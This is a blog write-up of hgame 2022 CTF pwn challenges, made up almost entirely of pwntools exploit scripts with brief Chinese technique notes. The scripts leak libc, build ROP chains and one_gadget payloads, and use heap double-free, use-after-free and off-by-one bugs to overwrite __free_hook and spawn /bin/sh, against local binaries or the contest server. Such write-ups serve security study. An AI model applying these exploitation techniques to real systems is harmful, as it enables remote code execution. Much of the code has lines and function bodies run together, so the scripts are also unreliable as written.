hgame 2022 PWN 部分题目 Writeup
2024-05-09 13:38:23
文章目录
- Level - Week1
- enter_the_pwn_land
- enter_the_evil_pwn_land
- test_your_nc
- test_your_gdb
- Level - Week2
- oldfashion_note
- Level - Week3
- changeable_note
- elder_note
- sized_note
Level - Week1
enter_the_pwn_land
#encoding=utf-8
from pwn import *
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hgame2022/pwn/enter_the_pwn_land/to_give_out/a.out'
r = process(fpath)
#r = remote("chuj.top",31952)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/enter_the_pwn_land/to_give_out/libc-2.31.so")
r.sendline("a"*0x20)
libc.address = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) +0x288f6-0x25000
print("libc_base:",hex(libc.address ))
poprdi=0x401312 + 1sys_addr=libc.symbols['system']
print("sys_addr:"+hex(sys_addr))sh_addr=next(libc.search(b"/bin/sh\0"))
print("sh_addr:"+hex(sh_addr))
payload = b'a'*0x2c+b'\x2d'+ b'\x00'*2+p64(0)+p64(poprdi+1)+p64(poprdi)+p64(sh_addr)+p64(sys_addr)r.sendline(payload)
r.interactive()
enter_the_evil_pwn_land
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hgame2022/pwn/enter_the_evil_pwn_land/to_give_out/a.out_2.31'
#r = process(fpath)
r = remote("chuj.top",38991)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/enter_the_evil_pwn_land/to_give_out/libc-2.31.so")r.sendline("a"*0x20)
libc.address = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) + 0x288f6 - 0x25000
print("libc_base:",hex(libc.address ))
canary=0x9999999999999900
poprdi=0x401362 + 1sys_addr=libc.symbols['system']
print("sys_addr:"+hex(sys_addr))
sh_addr=next(libc.search(b"/bin/sh\0"))
print("sh_addr:"+hex(sh_addr))one = [0xe6c7e, 0xe6c81, 0xe6c84] #2.31
one_addr = one[1]+libc.address
payload = b'a'*0x28+p64(canary)+p64(0)+p64(one_addr)
payload = payload.ljust(0x868,b'\0')
payload +=p64(canary)
time.sleep(1)
r.sendline(payload)
r.interactive()test_your_nc
nc chuj.top 50026
cat flag
test_your_gdb
#encoding=utf-8
from pwn import *
fpath='/mnt/d/ctf/ti/hgame2022/pwn/test_your_gdb/to_give_out/a.out'
r = process(fpath)
#r = remote("chuj.top",50610)
elf = context.binary = ELF(fpath)
payload=p64(0xb0361e0e8294f147)+p64(0x8c09e0c34ed8a6a9)
r.sendafter('enter your pass word', payload)
r.recvline()
r.recv(16)
a=u64(r.recv(8))
canary=u64(r.recv(8))
print("canary",hex(canary))
backdoor = 0x401256
payload=b'a'*24 + p64(canary)+p64(0)+p64(backdoor)
r.sendline(payload)
r.interactive()Level - Week2
oldfashion_note
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
context.log_level = 'debug'
#r = remote('chuj.top',51336)
fpath='/mnt/d/ctf/ti/hgame2022/pwn/oldfashion_note/to_give_out/note'
r = process(fpath)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/oldfashion_note/to_give_out/libc-2.31.so")
import hashlib,string,itertools
def crack_hash(hashcall, res, length, tailer):dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"for item in itertools.product(dateset, repeat=length):tmp = ("".join(item) + tailer).encode()htmp = hashcall(tmp).hexdigest()if htmp == res:print(tmp.decode())return tmp.decode()
def Proof_Of_Work():r.recvuntil("=== Proof Of Work ===\n")ti = r.recvline()[:-1]rsha256 = ti.split(b" == ")[1].decode()header=crack_hash(hashlib.sha256, rsha256, 4, '')r.sendline(header)#Proof_Of_Work()def _add(idx, lenn, ddd):r.sendlineafter(">> ",'1')r.sendlineafter("index?",str(idx))r.sendlineafter(">>",str(lenn))r.sendlineafter(">>",ddd)
def _edit(idx, ddd):r.sendlineafter(">> ",'2')r.sendlineafter("Input the index:\n",str(idx))#r.sendlineafter(":\n",str(lenn))r.sendlineafter(":\n",ddd)
def _remove(idx):r.sendlineafter(">> ",'3')r.sendlineafter(">>",str(idx))def _view(idx):r.sendlineafter(">> ",'2')r.sendlineafter(">>",str(idx))_add(0,0x90,"0") #0x100
_add(1,0x90,"1")#0x100for i in range(7):_add(7+i,0x90,"3")#0x100
for i in range(7):_remove(7+i)#0x100 _remove(0)
_view(0)main_arna_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print('main_arna_96:',hex(main_arna_96))malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']malloc_hook_addr = (main_arna_96 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print('libc_base:',hex(libc_base))
print('free_hook_addr:',hex(free_hook_addr))
print('system_addr:',hex(system_addr))
_add(2,0x60,"1")
_add(3,0x60,"1")
_add(4,0x60,"1")for i in range(7):_add(7+i,0x60,"3")#0x100
for i in range(7):_remove(7+i)#0x100
_remove(2)
_remove(3)
_remove(2)
for i in range(7):_add(7+i,0x60,"3")#0x100_add(3,0x60,p64(free_hook_addr))###uaf利用
_add(4,0x60,'/bin/sh\0')
_add(5,0x60,'11')
_add(6,0x60,p64(system_addr))_remove(4)
r.interactive()
Level - Week3
changeable_note
1、利用堆溢出 构造unsorted bin 和 fast bin 重叠
2、io_file_leak泄露libc
3、堆溢出构造free hook
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
fpath='/mnt/d/ctf/ti/hgame2022/pwn/changeable_note/note'
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/changeable_note/libc-2.23.so")import hashlib,string,itertools
def crack_hash(hashcall, res, length, tailer):dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"for item in itertools.product(dateset, repeat=length):tmp = ("".join(item) + tailer).encode()htmp = hashcall(tmp).hexdigest()if htmp == res:print(tmp.decode())return tmp.decode()
def Proof_Of_Work():r.recvuntil("=== Proof Of Work ===\n")ti = r.recvline()[:-1]rsha256 = ti.split(b" == ")[1].decode()header=crack_hash(hashlib.sha256, rsha256, 4, '')r.sendline(header)def _add(idx, lenn, ddd):r.sendlineafter(">> ",'1')r.sendlineafter("index?\n>> ",str(idx))r.sendlineafter(">> ",str(lenn))r.sendafter(">> ",ddd)
def _edit(idx, ddd):r.sendlineafter(">> ",'2')r.sendlineafter("index?\n>> ",str(idx))time.sleep(0.1)r.sendline(ddd)
def _remove(idx):r.sendlineafter(">> ",'3')r.sendlineafter("index?\n>> ",str(idx))def _view(idx):r.sendlineafter(">> ",'2')r.sendlineafter("index?\n>> ",str(idx))
def pwn():#因为edit使用的gets 会产生00结尾 无法使用edit修改 stdout 地址_add(0,0x60,b"0") #0x70_add(1,0x8,b"1") #0x20 防止后面重新申请时 不申请 释放的2 不与2相同。_add(2,0x8,b"2") #0x20_add(3,0x60,b"3"*0x28+p64(0x41)) #0x70 0x30+0x40 ###ffffffake_add(4,0x60,b"4") #0x70_add(5,0x60,b"5") #0x70_remove(3)_edit(1, b'0'*0x18+p64(0x51))_remove(2)_edit(0, b'\0'*0x68+p64(0x20+0x20+0x70+0x71))_remove(1)_add(1,0x30,b"1") #0x70_add(2,0x40,b'0'*0x18+p64(0x71)+b'\xdd\x85') #0x70_add(3,0x60,b"1") #0x70payload = b'\0'*0x33 + p64(0xfbad3887) + p64(0)*3 +b"\x88" #_chain filed _add(6, 0x60, payload) #fake chunk (stdout)libc.address = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) -libc.sym["_IO_2_1_stdin_"] libc.address = abs(libc.address)print("libc.address:", hex(libc.address))_add(7, 0x100, '7') _add(8, 0x100, '8') _remove(7)free_hook_addr = libc.symbols['__free_hook']system_addr = libc.symbols['system']print("free_hook_addr:", hex(free_hook_addr))print("system_addr:", hex(system_addr))_edit(5,b'5'*0x68+p64(0x110)+p64(free_hook_addr-29)+p64(free_hook_addr-29)) #0x70 0.5 用于修改1大小 _add(7,0x100,"1") #0x70_remove(4)print('free_hook_addr:',hex(free_hook_addr))_edit(3, b'0'*0x68+p64(0x71)+p64(free_hook_addr-16))_add(8,0x60,b"/bin/sh") #0x70 _add(9,0x60,p64(system_addr)) #0x70_remove(8)r.interactive()while True: try:r = process(fpath)#r = remote("chuj.top",52595)#Proof_Of_Work()pwn() breakexcept:r.close()
elder_note
1、fastbin doublefree 构造堆重叠改写堆构造unsortedbin攻击泄露libc
2、使用unsorted bin 在__free_hook前写入7f
3、使用fastbin doublefree 构造free hook
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
#r = remote('chuj.top',52603)
fpath='/mnt/d/ctf/ti/hgame2022/pwn/elder_note/note'
r = process(fpath)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/elder_note/libc-2.23.so")import hashlib,string,itertools
def crack_hash(hashcall, res, length, tailer):dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"for item in itertools.product(dateset, repeat=length):tmp = ("".join(item) + tailer).encode()htmp = hashcall(tmp).hexdigest()if htmp == res:print(tmp.decode())return tmp.decode()
def Proof_Of_Work():r.recvuntil("=== Proof Of Work ===\n")ti = r.recvline()[:-1]rsha256 = ti.split(b" == ")[1].decode()header=crack_hash(hashlib.sha256, rsha256, 4, '')r.sendline(header)
#Proof_Of_Work()def _add(idx, lenn, ddd):r.sendlineafter(">> ",'1')r.sendlineafter("index?",str(idx))r.sendlineafter(">>",str(lenn))r.sendafter(">>",ddd)
def _edit(idx, ddd):r.sendlineafter(">> ",'2')r.sendlineafter("Input the index:\n",str(idx))#r.sendlineafter(":\n",str(lenn))r.sendlineafter(":\n",ddd)
def _remove(idx):r.sendlineafter(">> ",'3')r.sendlineafter(">>",str(idx))def _view(idx):r.sendlineafter(">> ",'2')r.sendlineafter(">>",str(idx))_add(0,0x60,b"1"*0x58+p64(0x71)) #0x70
_add(1,0x60,b"1"*0x58+p64(0x71)) #0x70
_add(2,0x50,"1") #0x60
_add(3,0x60,"1") #0x70
_remove(0)
_remove(1)
_remove(0)_add(0,0x60,"\x60") #0x70 0
_add(1,0x60,"0") #0x70
_add(4,0x60,"0") #0x70 4==0_add(5,0x60,p64(0)+p64(0xd1)) #0x70 0.5 用于修改1大小
_remove(1)
_view(1)
main_arna_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print('main_arna_96:',hex(main_arna_96))malloc_hook_s = libc.symbols['__malloc_hook']
malloc_hook_addr = (main_arna_96 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base +libc.symbols['__free_hook']
system_addr = libc_base + libc.sym['system']
print('libc_base:',hex(libc_base))
print('free_hook_addr:',hex(free_hook_addr))
print('system_addr:',hex(system_addr))_remove(5)
_add(5,0x60,p64(0)+p64(0x71)+p64(free_hook_addr-29)+p64(free_hook_addr-29)) #0x70 0.5 用于修改1大小
_add(1,0x60,"1") #0x70_remove(0)
_remove(1)
_remove(0)_add(0,0x60,p64(free_hook_addr-16)) #
_add(1,0x60,"/bin/sh")#
_add(6,0x60,"4")#
_add(7,0x60,p64(system_addr))#0x100
_remove(1)r.interactive()sized_note
off by one
#encoding=utf-8
from pwn import *
import time
context(os='linux',arch='amd64')
#r = remote('chuj.top',52919)
fpath='/mnt/d/ctf/ti/hgame2022/pwn/sized_note/note'
r = process(fpath)
elf = context.binary = ELF(fpath)
libc =ELF("/mnt/d/ctf/ti/hgame2022/pwn/sized_note/libc.so.6")import hashlib,string,itertools
def crack_hash(hashcall, res, length, tailer):dateset = string.ascii_lowercase + string.ascii_uppercase + string.digits + "+-*/"for item in itertools.product(dateset, repeat=length):tmp = ("".join(item) + tailer).encode()htmp = hashcall(tmp).hexdigest()if htmp == res:print(tmp.decode())return tmp.decode()
def Proof_Of_Work():r.recvuntil("=== Proof Of Work ===\n")ti = r.recvline()[:-1]rsha256 = ti.split(b" == ")[1].decode()header=crack_hash(hashlib.sha256, rsha256, 4, '')r.sendline(header)#Proof_Of_Work()def _add(idx, lenn, ddd):r.sendlineafter(">> ",'1')r.sendlineafter("index?\n>> ",str(idx))r.sendlineafter(">> ",str(lenn))r.sendafter(">> ",ddd)
def _edit(idx, ddd):r.sendlineafter(">> ",'4s')r.sendlineafter("index?\n>> ",str(idx))time.sleep(0.1)r.sendline(ddd)
def _del(idx):r.sendlineafter(">> ",'3')r.sendlineafter("index?\n>> ",str(idx))def _view(idx):r.sendlineafter(">> ",'2')r.sendlineafter("index?\n>> ",str(idx))_add(0, 0xf8, '0') #chunksize 0x500
_add(1, 0xf8, '1') #chunksize 0x500
_add(2, 0xf8, '2') #chunksize 0x200
_add(3, 0xf8, '3') #chunksize 0x500
_add(4, 0xf8, '4') #chunksize 0x500
_add(5, 0x20, '/bin/sh\0 3')for i in range(7):_add(7+i, 0xf8, '2') #chunksize 0x500
for i in range(7):_del(7+i) #chunksize 0x500
_del(0)
_edit(1,b'a'*0xf0 + p64(0x200))
_del(2)
for i in range(7):_add(7+i, 0xf8, '2') #chunksize 0x500
_add(0, 0xf8, '0') #chunksize 0x500
_view(1)main_arna_96 = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print('main_arna_96:',hex(main_arna_96))malloc_hook_s = libc.symbols['__malloc_hook']
malloc_hook_addr = (main_arna_96 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base +libc.symbols['__free_hook']
system_addr = libc_base + libc.sym['system']
print('libc_base:',hex(libc_base))
print('free_hook_addr:',hex(free_hook_addr))
print('system_addr:',hex(system_addr))_add(5, 0x20, '5') # 5 和 1 指向同一地址。
_del(5) # uaf
_edit(1, p64(free_hook_addr))
_add(6,0x20, '/bin/sh\0 #6')
_add(7,0x20, p64(system_addr))_del(6) #3 6都行
r.interactive()hgame 2022 PWN 部分题目 Writeup相关推荐
- 2022巅峰极客WriteUp By EDISEC
2022巅峰极客WriteUp By EDISEC Web babyweb ezWeb Crypto point-power strange curve Pwn Gift smallcontainer ...
- HGAME 2022 week1 个人部分WP
寒假期间,小萌新在家瞎搞CTF,也是第一次参加HGAME,整体来说题目是简单的,但对于我这个萌新菜鸟来说,还是一头雾水,只会做一些简单的密码题,week1的web和misc还能做出几题,后面几周就完全 ...
- 2022煤气上岗证题目及答案
题库来源:安全生产模拟考试一点通公众号小程序 2022煤气培训试题系煤气试卷的新全考试题型!2022煤气上岗证题目及答案根据煤气最新教材汇编.煤气复审模拟考试随时根据安全生产模拟考试一点通上提高应试能 ...
- DMCTF部分题目writeup
DMCTF部分题目writeup 文章目录 DMCTF部分题目writeup 一.Reverse 二.Web 三.Crypto 四.Misc E·N·D 首先说明本蒟蒻是大一菜鸡,刚刚入门CTF,啥也 ...
- 2020年第二届“网鼎杯”网络安全大赛 白虎组 部分题目Writeup
2020年第二届"网鼎杯"网络安全大赛 白虎组 部分题目Writeup 2020年网鼎杯白虎组赛题.zip下载 https://download.csdn.net/download ...
- 2020网鼎杯青龙组部分题目writeup
2020网鼎杯青龙组部分题目writeup 0x00 Crypto之boom 0x00 Crypto之boom 下载下来是个exe文件,拖到cmd运行(切记一定不要双击,用cmd打开,双击运行后最后程 ...
- HGAME 2022 Writeup
文章目录 Level - Week1 WEB easy_auth 蛛蛛-嘿嘿?我的蛛蛛 Tetris plus Fujiwara Tofu Shop MISC 欢迎欢迎!热烈欢迎! 这个压缩包有点麻烦 ...
- 2021-NCTF pwn方向题目复现
周末在学校摸鱼了所以没有参加比赛,赛后看题又一次深刻的感觉到自己有多菜了(被新生赛暴打的大二菜狗子 1.easyheap 算是pwn的签到题目了,从libc2.32起加了一个异或的保护,不过因为uaf ...
- CTF(Pwn) 当题目为我们提供Libc版本.so文件, 与 不提供的区别
做了一道题目,它提供了 libc文件; 这道题 可以使用 libc-2.23.so文件 来 解出来, 也可以不使用; 当使用 libc2.23.so文件时 EXp为 from pwn import * ...
最新文章
- python文件io是啥意思_Python文件IO(普通文件读写)
- 怎样解决WampServer #1405 - Access denied for user #39;root#39;@#39;localhost#39; (using password: NO...
- idea2020搜索不到插件的问题
- js中遍历注册事件时索引怎么获取
- linux命令之seq
- android bmob获取数据,Android基于bmob后端云实现数据读取
- 输电线路巡检机器人PPT_国网泰安供电公司开展输电线路无人机精细化巡检
- wifi app 服务器无响应,无法连接到 App Store 要怎么办?
- JN5169 NXP ZigBee PRO 无线网络应用所需的常见操作(二)
- 随笔记:组合模式之 宏命令(macro command)
- 如何以2万美元出售你的软件
- 【数模之数据分析-2】
- qt中toLocal8Bit和toUtf8()有什么区别
- 刷二维码加上微信企业号与arduino实现门禁管理
- UNITY之EventTrigger,EventListener
- 二十五、广域网,PPP协议和HDLC协议
- 张家界市4月份计算机职称,2017年4月张家界计算机应用能力考试报名时间4月10日起...
- npm与package.json
- GUI界面的初步认识及其开发工具QT
- iOS里面Frameworks 的介绍